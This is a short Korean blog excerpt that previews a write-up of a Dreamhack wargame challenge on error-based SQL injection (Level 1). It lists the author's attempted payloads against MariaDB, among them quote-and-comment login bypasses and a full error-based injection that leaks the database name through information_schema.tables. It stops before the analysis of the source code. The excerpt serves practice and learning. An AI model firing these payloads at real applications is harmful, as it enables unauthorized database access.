반응형 SQL INJECTION1 드림핵 워게임 error based sql injection 문제 풀이 (Level 1) 드림핵 사이트의 워게임 중 웹 해킹 관련error based sql injection 문제 풀이 (Level 1) 문제에 대해서 정리해보려 합니다 Simple Error Based SQL Injection ! admin을 입력 ' 하나만 입력을 해보니 관련해서 syntax 에러 설명이 나온다 MariaDB를 사용함을 확인함#추가 시도 방법' #' or '1' #' or '1' --admin or '1' #1' AND (SELECT 1 FROM (SELECT COUNT(*), CONCAT((SELECT database()), 0x3a, FLOOR(RAND()*2)) AS x FROM information_schema.tables GROUP BY x) AS y) 이쯤에서 주어진 소스를 확인해 본다 .. 2024. 11. 11. 이전 1 다음 반응형
